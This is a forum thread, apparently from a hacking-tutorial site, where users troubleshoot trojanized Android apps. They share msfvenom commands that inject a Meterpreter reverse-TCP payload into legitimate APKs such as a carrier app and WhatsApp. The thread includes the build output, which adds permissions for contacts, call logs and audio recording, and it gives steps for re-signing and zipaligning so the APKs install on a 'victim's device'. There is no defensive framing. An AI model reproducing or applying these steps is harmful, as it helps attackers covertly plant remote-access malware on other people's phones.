Tried making some .apk payloads but every single one I made is not working properly. I tried making payloads and remaking original .apk files using msfvenom. When I try to install it it says: Parse error: There is problem parsing the package. I also tried it using some ruby script but same problem occurred. It happens on multiple devices. Anyone knows what I'm doing wrong?
P.S. If anyone have some .apk payload which works properly could you share it with me?
Forum Thread:
When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen.
8
Replies
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
12
Replies
Forum Thread:
Hydra Syntax Issue Stops After 16 Attempts
2
Replies
Forum Thread:
Hack Instagram Account Using BruteForce
208
Replies
Forum Thread:
Metasploit reverse_tcp Handler Problem
47
Replies
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
22
Replies
Metasploit Error:
Handler Failed to Bind
41
Replies
Forum Thread:
How to Hack Android Phone Using Same Wifi
21
Replies
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
177
Replies
How to:
Crack Instagram Passwords Using Instainsane
36
Replies
Forum Thread:
How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More
5
Replies
Forum Thread:
How Many Hackers Have Played Watch_Dogs Game Before?
13
Replies
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
55
Replies
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
10
Replies
Forum Thread:
How to Run and Install Kali Linux on a Chromebook
18
Replies
Forum Thread:
How to Find Admin Panel Page of a Website?
13
Replies
Forum Thread:
can i run kali lenux in windows 10 without reboting my computer
4
Replies
Forum Thread:
How to Hack School Website
11
Replies
Forum Thread:
Make a Phishing Page for Harvesting Credentials Yourself
8
Replies
Forum Thread:
Creating an Completely Undetectable Executable in Under 15 Minutes!
38
Replies
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
How To:
Exploit EternalBlue on Windows Server with Metasploit
BT Recon:
How to Snoop on Bluetooth Devices Using Kali Linux
How To:
Reverse Engineering with Radare2 (A Quick Introduction)
How To:
Perform an Attack Over WAN (Internet)
How To:
Dox Anyone
How To:
Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
How To:
Enumerate SMB with Enum4linux & Smbclient
How To:
Make Your Own Bad USB
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
Hack Like a Pro:
How to Find Directories in Websites Using DirBuster
How To:
Use SpiderFoot for OSINT Gathering
How To:
Exploring Kali Linux Alternatives: Getting Started with Pentoo for Advanced Software Installations
How To:
Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther
How To:
Exploit Java Remote Method Invocation to Get Root
Hack Like a Pro:
How to Scan for Vulnerabilities with Nessus
How To:
Crack SSH Private Key Passwords with John the Ripper
How To:
Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
24 Responses
Since Android apps are based on Java, APK's contains Dalvik Bytecode which isn't compatible with any shellcode based payloads and / or encoders. I don't know weather Metasploit comes with special Android payloads, but don't expect to get your average reverse tcp meterpreter payload running.
can you post the code that you're using so we can help you to find the problem
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R > /sdcard/hackmingtest.apk
App error image
Try for signing your apk file. I have the same problem
assuming you are using ruby script to automate payload generation, are you signing the apk's before installing?
use the command d2j-apk-sign yourpayload.apk
i made a payload using spynote and it too had the same problem of parsimg error....i tried to sign it usimg the apktool...but im not able to sign it...
hello friends my name is yagnesh ... *i have bind payload apk in whatsapp and install perfectly when i try to open it it says whatsapp not risponding and in samsung j2 i have try to install bind facebook lite but not install and also sign thise apk
Hello, I thought I should share my thoughts, I always embed original apk with payload just by entering these command:
msfvenom -x apkname.apk -p android/meterpreter/reverse_tcp lport=4444 lhost=yourip -o output file name.apk
If you don't have zipalign then install it
It's so easy in Kali 2017.1
Hope I could help, I was successful in embedding payload in almost every original apk
I did with the same. But when I open app it will not open any session.
please give your code that you wrote
guys anyone can help me ? i am not able to install that apk.payload
root@kali:~/Downloads# msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=1110 -o /root/Desktop/myideafreerecharge.apk
Using APK template: myidea.apk
Creating signing key and keystore..
* Decompiling original APK..
* Decompiling payload APK..
* Locating hook point..
* Adding payload as package com.ideacellular.myidea.jsawk
* Loading /tmp/d20181112-14457-2vcc90/original/smali/com/ideacellular/myidea/MyIdeaApplication.smali and injecting payload..
* Poisoning the manifest with meterpreter permissions..
* Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
* Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
* Adding <uses-permission android:name="android.permission.WRITECALLLOG"/>
* Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
* Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
* Adding <uses-permission android:name="android.permission.CHANGEWIFISTATE"/>
* Adding <uses-permission android:name="android.permission.READCALLLOG"/>
* Rebuilding myidea.apk with meterpreter injection as /tmp/d20181112-14457-2vcc90/output.apk
Error: Unable to rebuild apk with apktool
Try it in your root....
use this command so solve it
apktool empty-framework-dir --force
I used this command pro but I got an error when I tried to install the poisoned apk
It says package appears to be corrupt
After all tries
Totally, I made
But the problem here is when I'm done with the process :
i.e., Before binding the apk with payload the size is 16.9 mb
but after binding that the size of payload is 177bytes
What have to do ???
your code?
The apk has to be digitally signed to install on the android device if not you"re likely to receive the App not installed message
A free application for signing apps is available on Google Play Store
I don't think it's possible. There was a vulnerability before called Janus. But it was fixed after the Noughat update. So its practically impossible to sign an APK with its original signature after extracting,editing and re-packing. Either you need to sign it with a signature or find another vulnerability after doing some research.
Idk why these guys are posting wrong answers, you just need to sign the apk
Check aapt and aapt2 are installed and working fine
If they works fine then
Step 1: Manually Decompile Apk With
Apktool d <filename> --aapt2
OR
Apktool d <filename> --aapt
Step 2: Edit APK
Try opening the manifest with an editor if it crashes you're having a error in apktool reinstall it (new versions could have bugs so install a previous one.)
Step 3: Build the APK
Use
Apktool b <filename> --aapt
Or
Apktool b <filename> --aapt2
Step 4: Sign the APK
bro make a post about ss7 attack....
i had signed the APK still i get the parse error message while installing the apk. if anybody has fixed it , please reply.
I created a reverse_tcp payload using metasploit, signed it using jarsigner and then zipaligned it......but when I tried installing it on victim's device it doesn't get installed
Share Your Thoughts